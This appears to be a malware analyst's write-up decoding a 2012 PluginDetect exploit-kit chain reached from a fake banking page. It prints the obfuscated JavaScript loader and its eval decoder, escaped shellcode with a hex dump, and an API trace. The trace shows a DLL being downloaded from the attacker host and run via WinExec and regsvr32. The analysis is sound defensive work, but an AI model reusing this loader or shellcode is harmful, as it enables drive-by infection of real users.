# MalwareMustDie - PluginDetect Decoding Guide
# for the Trojan parfeit Investigation
# (Credential Stealer Case)
------------
--18:06:57-- h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
=> `cpa_inform.htm'
Resolving www.irwra.com... 50.116.98.44
Connecting to www.irwra.com|50.116.98.44|:80... connected.
HTTP request sent, awaiting response... HTTP/1.1 200 OK
// real time with Xurl..
@unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 813 100 813 0 0 1187 0 --:--:-- --:--:-- --:--:-- 4567
Processing request... Banking, Credit Cards, Lending & Investing - CPA
You will be redirected to details of purchase
We must complete few security checks to show your transfer details:
Be sure you have a transfer reference ID. You will be asked to enter it after we check the link. Important: Please be advised that calls to and from your wire service team may be monitored or recorded.
Redirecting to Survey details... Please wait...
------------------------------------------------
--2012-12-22 03:44:27-- h00p://latticesoft.net/detects/continues-little.php
Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.
---request begin---
GET /detects/continues-little.php HTTP/1.1
Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: #MalwareMustDie!
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.14
200 OK
Length: unspecified [text/html]
Saving to: `continues-little.php'
2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]
--------------------------------------------------------
TRY TWO:
--14:18:07-- h00p://latticesoft.net/detects/continues-little.php
=> `continues-little.php.1'
Resolving latticesoft.net... seconds 0.00, 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5348 (new refcount 1).
---request begin---
GET /detects/continues-little.php HTTP/1.0
Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 22 Dec 2012 05:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14
---response end---
200 OK
Length: unspecified [text/html]
14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337] <=============== the size changes....
---------------
// CHANGES!!!!!! WHy? What?
// what had changed??
// let's use unix's diff command to diff the previous code w/new one and see what's changes the moronz did:
0x001c1
<
// tags and you're good to go.
// So, the structure of the current obfuscated structure is:
a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
z0+1
:
z29
// And this is the code to feed obfuscated data...
dd="i";
pp="e"+"In";
asd=function()
{
for(i=0;;i++)
{
r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
}};
a=document.createElement(dd);
// Thus, this is the generator part to crack the code;
document.body.appendChild(a);
if(document.getElementsByTagName("d"+"iv")[0].style.left==="")
{
ss=String.fromCharCode;
a=document["getElementsB"+"yTagName"](dd);
a=a[0];
s=new String();
asd();
a=s;
s=new String();
e=window["eva"+"l"];
p=parseInt;
for(i=0;a.length>i;i+=2)
{
if(a["su"+"bstr"](i,1)=="-")i+=2;
s=s+(ss((p(a["substr"](i,2),23)-24)/3));
}
try
{
document.body*=document;
}
catch(asfas)
{
e("if(1)"+s);
}
}
// And this is the logic formula to crack :
// here's the formula...
for(i=0;a.length>i;i+=2)
{
if(a["substr"](i,1)=="-")i+=2;
s=s+(ss((p(a["substr"](i,2),23)-24)/3));
}
// You can manipulate the decoding operation easlizy by making
// array of a element and feed the array 0 to 29 with
// the garbled code one by one and just feed it into the
// formula.
//And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)
var PluginDetect =
{
version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
{
return function ()
{
c(b, a)
}
}
, openTag : "<", isDefined : function (b)
{
return typeof b != "undefined"
}
, isArray : function (b)
{
return (/array/i).test(Object.prototype.toString.call(b))
:
:(blah! etc)
//let's modify shellcode to grab the payload:
var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var x=a["replace"](/\%!/g, "%" + "u");
document.write(x);
↓↓
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828
// here's the shellcode (in bin & text)....
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 08 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 44 49 5c 5c 41 4b 4d 5b X@\\X...DI\\AKM[
47 4e 5c 06 46 4d 5c 07 4c 4d 5c 4d 4b 5c 5b 07 GN\.FM\.LM\MK\[.
4b 47 46 5c 41 46 5d 4d 5b 05 44 41 5c 5c 44 4d KGF\AF]M[.DA\\DM
06 58 40 58 17 52 4e 15 1b 18 12 1a 5e 12 19 4e .X@X.RN.....^..N
12 19 42 12 1b 18 0e 4f 4d 15 19 46 12 1a 5f 12 ..B....OM..F.._.
19 41 12 19 42 12 19 47 12 19 41 12 19 4f 12 1a .A..B..G..A..O..
5e 12 19 45 12 19 45 0e 44 15 19 43 0e 41 5f 15 ^..E..E.D..C.A_.
52 0e 40 4e 15 4c 28 28 R.@N.L((
// And the translation of the API.....
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
----
#MalwareMustDie!
unixfreaxjp /malware]$ date
Sat Dec 22 18:59:02 JST 2012